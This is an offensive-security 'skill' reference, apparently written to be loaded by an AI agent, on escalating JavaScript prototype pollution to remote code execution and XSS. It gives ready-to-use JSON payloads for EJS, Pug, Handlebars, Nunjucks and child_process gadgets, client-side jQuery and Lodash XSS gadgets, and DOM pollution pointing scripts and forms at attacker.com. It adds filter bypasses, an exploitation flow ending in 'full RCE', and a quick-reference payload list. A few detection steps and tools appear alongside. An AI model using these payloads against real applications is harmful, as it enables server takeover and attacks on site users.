SKILL: Prototype Pollution Advanced — RCE & Gadget Exploitation
AI LOAD INSTRUCTION: Advanced prototype pollution escalation. Covers server-side RCE via template engines (EJS, Pug, Handlebars), Node.js child_process gadgets, client-side script gadgets, filter bypass patterns, and systematic detection. Load ../prototype-pollution/SKILL.md first for fundamentals (merge sinks,
__proto__vsconstructor.prototype, basic probes).
0. RELATED ROUTING
- prototype-pollution — LOAD FIRST for PP fundamentals, merge-sink detection, basic probes
- ssti-server-side-template-injection — template engine RCE context (PP often triggers through template gadgets)
- xss-cross-site-scripting — client-side PP gadgets ultimately achieve XSS
Advanced Reference
Load KNOWN_GADGETS.md for the comprehensive gadget table by framework/library with polluted properties, trigger conditions, impact, and affected versions.
1. SERVER-SIDE PP → RCE
1.1 Node.js child_process.spawn — Shell/ENV Injection
When child_process.spawn or child_process.fork is called without explicit env/shell options, it inherits from Object.prototype:
// Vulnerable pattern (very common):
const { execSync } = require('child_process');
execSync('ls'); // inherits shell, env from prototype
// Pollution for RCE:
Object.prototype.shell = '/proc/self/exe';
Object.prototype.argv0 = 'console.log(require("child_process").execSync("id").toString())//';
Object.prototype.NODE_OPTIONS = '--require /proc/self/cmdline';
// Next child_process call executes attacker code
Alternative ENV pollution:
{"__proto__": {"shell": "node", "NODE_OPTIONS": "--require /proc/self/cmdline"}}
1.2 EJS (Embedded JavaScript Templates)
EJS render() reads opts from object properties. Polluting outputFunctionName injects code into the compiled template function:
// Pollution payload:
{"__proto__": {"outputFunctionName": "x;process.mainModule.require('child_process').execSync('id');s"}}
// When EJS renders ANY template after pollution:
// Compiled function includes: var x;process.mainModule.require('child_process').execSync('id');s = "";
// → RCE
Detection: any EJS res.render() call after pollution triggers it.
1.3 Pug (formerly Jade)
Pug's compiler reads block from object properties:
{"__proto__": {"block": {"type": "Text", "val": "x]);process.mainModule.require('child_process').execSync('id');//"}}}
Alternative via self option:
{"__proto__": {"self": true, "line": "x]});process.mainModule.require('child_process').execSync('id');//"}}
1.4 Handlebars
Handlebars template compilation checks type and program on template AST nodes:
{"__proto__": {"type": "Program", "body": [{"type": "MustacheStatement", "path": {"type": "PathExpression", "original": "constructor.constructor('return process.mainModule.require(`child_process`).execSync(`id`)')()","parts": ["constructor","constructor"]}, "params": [], "hash": null}]}}
Simpler via allowProtoMethodsByDefault:
{"__proto__": {"allowProtoMethodsByDefault": true, "allowProtoPropertiesByDefault": true}}
// Then use {{#with this as |obj|}}{{obj.constructor.constructor "return process.mainModule.require('child_process').execSync('id')"}}{{/with}}
1.5 Nunjucks
{"__proto__": {"type": "Code", "value": "global.process.mainModule.require('child_process').execSync('id')"}}
1.6 Express res.render (Generic)
When Express calls res.render(), options merge with app.locals and res.locals. Polluted prototype properties appear as template variables:
{"__proto__": {"view options": {"outputFunctionName": "x;process.mainModule.require('child_process').execSync('id');s"}}}
2. CLIENT-SIDE PROTOTYPE POLLUTION
2.1 jQuery Gadgets
$.extend(true, {}, userInput) performs deep merge — classic PP sink.
After pollution, jQuery's HTML methods use polluted properties:
// Pollution:
Object.prototype.innerHTML = '<img src=x onerror=alert(1)>';
// Trigger: any jQuery DOM manipulation that reads innerHTML from prototype
$('<div>').appendTo('body'); // may use polluted property
2.2 Lodash Gadgets
// Vulnerable functions (deep merge):
_.merge({}, userInput)
_.defaultsDeep({}, userInput)
_.set(obj, path, value) // if path is attacker-controlled
// template() gadget:
Object.prototype.sourceURL = '\u000ajavascript:alert(1)//';
_.template('hello')(); // sourceURL injected into Function constructor
2.3 Script Gadgets in Frameworks
"Script gadgets" are framework code paths that read from Object.prototype and perform dangerous operations:
| Framework | Gadget Pattern | Polluted Property | Impact |
|---|---|---|---|
| jQuery | $.html(), element creation | innerHTML, src | XSS |
| Angular.js | $interpolate | __defineGetter__ | XSS |
| Vue.js | Template compilation | template, render | XSS |
| Ember.js | Component rendering | Various view properties | XSS |
| Backbone.js | _.template | sourceURL | XSS |
2.4 DOM Property Pollution
Object.prototype.src = 'https://attacker.com/evil.js';
Object.prototype.href = 'javascript:alert(1)';
Object.prototype.action = 'https://attacker.com/phish';
// Any dynamically created element may inherit these
3. DETECTION TECHNIQUES
3.1 Black-Box Server-Side Detection
Step 1: Inject and check
POST /api/endpoint
{"__proto__":{"polluted":"yes"}}
Then: GET /api/anything
Check if response contains "polluted" or behavior changes
Step 2: Error-based detection
{"__proto__":{"toString":1}}
→ If server crashes or returns 500, toString was overwritten
{"__proto__":{"valueOf":1}}
→ Same crash-based detection
Step 3: Response differential
{"__proto__":{"status":555}}
→ Check if HTTP status code changes to 555
{"__proto__":{"content-type":"text/plain"}}
→ Check if Content-Type header changes
3.2 Black-Box Client-Side Detection
// In browser console after interacting with the app:
Object.prototype.testPollution
// If returns a value → something polluted the prototype
// Automated: override defineProperty to detect writes
Object.defineProperty(Object.prototype, '__proto__', {
set: function(v) { console.trace('PP detected!', v); }
});
3.3 Automated Tools
| Tool | Type | Purpose |
|---|---|---|
| PPScan | Burp Extension | Scans for server-side PP |
| server-side-prototype-pollution | Burp Extension (Gareth Heyes) | Advanced server-side PP detection with multiple techniques |
| ppfuzz | CLI | Fuzz for client-side PP via URL fragment/query |
| ppmap | CLI | Map client-side PP to known gadgets |
4. BYPASS __proto__ FILTERS
4.1 constructor.prototype Path
// Instead of:
{"__proto__": {"polluted": "yes"}}
// Use:
{"constructor": {"prototype": {"polluted": "yes"}}}
4.2 Bracket Notation Variants
?constructor[prototype][polluted]=yes
?__proto__[polluted]=yes
?__pro__proto__to__[polluted]=yes (if filter strips __proto__ once)
4.3 JSON Key Variations
{"__proto__": {"a": 1}}
{"constructor": {"prototype": {"a": 1}}}
{"__proto__\u0000": {"a": 1}}
4.4 Key Distinction: Shallow vs Deep
Object.assign does NOT pollute prototype (shallow copy, safe). Only recursive/deep merge functions are vulnerable. Always verify the merge depth.
5. EXPLOITATION FLOW
1. Find merge sink (../prototype-pollution/SKILL.md Section 0)
└── JSON body parsed and deep-merged into server object
2. Confirm pollution:
└── {"__proto__":{"testxyz":"1"}} → check if testxyz appears globally
3. Identify technology stack:
├── Express + EJS → outputFunctionName gadget (Section 1.2)
├── Express + Pug → block gadget (Section 1.3)
├── Express + Handlebars → type/program gadget (Section 1.4)
├── Any Node.js with child_process → shell/NODE_OPTIONS (Section 1.1)
├── Client-side jQuery → DOM gadgets (Section 2.1)
├── Client-side Lodash → template/sourceURL (Section 2.2)
└── Unknown → try KNOWN_GADGETS.md systematically
4. Craft RCE/XSS payload matching gadget
5. Verify with safe payload first (sleep / DNS callback)
6. Escalate to full RCE
6. DECISION TREE
Confirmed prototype pollution?
│
├── Server-side or client-side?
│ │
│ ├── SERVER-SIDE
│ │ ├── Template engine in use?
│ │ │ ├── EJS → __proto__.outputFunctionName (Section 1.2)
│ │ │ ├── Pug → __proto__.block (Section 1.3)
│ │ │ ├── Handlebars → __proto__.type (Section 1.4)
│ │ │ ├── Nunjucks → __proto__.type (Section 1.5)
│ │ │ └── Unknown → try each gadget from KNOWN_GADGETS.md
│ │ │
│ │ ├── child_process used anywhere?
│ │ │ ├── YES → __proto__.shell + NODE_OPTIONS (Section 1.1)
│ │ │ └── MAYBE → inject and trigger error to reveal stack
│ │ │
│ │ └── No known gadget?
│ │ ├── Try status code pollution: __proto__.status = 555
│ │ ├── Try header pollution: __proto__.content-type
│ │ └── Check KNOWN_GADGETS.md for framework match
│ │
│ └── CLIENT-SIDE
│ ├── jQuery loaded?
│ │ ├── YES → $.extend deep merge + DOM gadgets (Section 2.1)
│ │ └── Check ppmap for automated gadget detection
│ │
│ ├── Lodash loaded?
│ │ ├── YES → _.template sourceURL gadget (Section 2.2)
│ │ └── _.merge as both sink AND gadget
│ │
│ └── Framework (Angular/Vue/Ember)?
│ └── Script gadget lookup (Section 2.3)
│
├── __proto__ keyword filtered?
│ ├── Try constructor.prototype (Section 4.1)
│ ├── Try bracket notation (Section 4.2)
│ └── Try JSON key variations (Section 4.3)
│
└── Not confirmed yet?
└── Go back to ../prototype-pollution/SKILL.md for detection
7. QUICK REFERENCE — KEY PAYLOADS
// EJS RCE
{"__proto__":{"outputFunctionName":"x;process.mainModule.require('child_process').execSync('id');s"}}
// Pug RCE
{"__proto__":{"block":{"type":"Text","val":"x]);process.mainModule.require('child_process').execSync('id');//"}}}
// child_process RCE (Node.js)
{"__proto__":{"shell":"node","NODE_OPTIONS":"--require /proc/self/cmdline"}}
// Lodash template XSS
{"__proto__":{"sourceURL":"\u000ajavascript:alert(1)//"}}
// Filter bypass (constructor path)
{"constructor":{"prototype":{"outputFunctionName":"x;process.mainModule.require('child_process').execSync('id');s"}}}
// Safe detection probe
{"__proto__":{"pptest123":"polluted"}}